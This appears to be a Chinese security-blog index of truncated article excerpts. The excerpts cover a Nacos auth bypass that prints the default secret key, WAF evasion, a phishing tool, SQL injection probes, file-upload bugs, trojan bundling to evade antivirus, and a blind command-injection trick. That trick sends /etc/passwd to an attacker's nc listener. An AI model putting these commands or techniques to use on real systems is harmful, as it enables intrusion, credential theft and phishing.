Nacos 身份认证绕过 由于 secret.key 值为默认 ### The default token(Base64 String): nacos.core.auth.default.token.secret.key=SecretKey012345678901234567890123456789012345678901234567...

最近看到大佬们都在搞分块传输，据说能吊打所有waf，所以我也跟随大佬们的脚步。 首先先了解下什么是分块传输。 分块传输编码（Chunked transfer encoding）是超文本传输协议（HTTP）中的一种数...

项目地址: GitHub: https://github.com/xsxtw/nexphisher nexphisher自动化钓鱼工具描述 ①NexPhisher是专为Termux和Linux开发的自动网络钓鱼工具。 ②NexPhisher这个工具有30个网站的37个网络...

靶机无回显的情况下，可使用 cancel  来把回显发送到攻击机端 cancel -u '$(cat /etc/passwd)' -h ip:port 攻击机用nc来接收返回信息 nc -lvvp [port] 实例演示： 攻击机ip：192...

updatexml报错手工注入

1. 文件上传漏洞挖掘： (1) 关键字搜索（函数、键字、全局变量等）：比如 $_FILES，move_uploades_file 等 (2) 应该功能抓包：寻找任何可能存在上传的应用功能点，比如前台会员中心，后台新闻添...

溯源反制 - 自搭建蜜罐到反制攻击队 前言 本篇文章结合最近的 ps 比赛和之前的案例总结了一些作为蓝队的经验，希望能对蓝队溯源得分有所帮助，如果还有其他奇招妙法欢迎师傅们多多交流 溯源反制...

简介大家在制作捆版木马时碰到一个问题大多捆绑软件本身就会被杀软查杀，即便捆绑两个正常软件也会被查杀。今天给大家分享一个利用winrar实现免杀的捆绑技术。 大家在制作捆版木马时碰到一个问...

http://xxx.com/news_blank.php?id=296 and 1=1 http://xxxxx.com/news_blank.php?id=296+and+1=1 http://xxxxx.com/news_blank.php?id=296+and+1=2 确认是注入 http://xxxx.com/news_blank.ph...

我的msf有卸载重装过，所以不知道啥原因导致连接不上数据库。然后我也把数据库卸载了重新安装过。 安装PostgreSQL 9.6yum install postgresql96-server postgresql96-contrib 初始化数据库/usr/...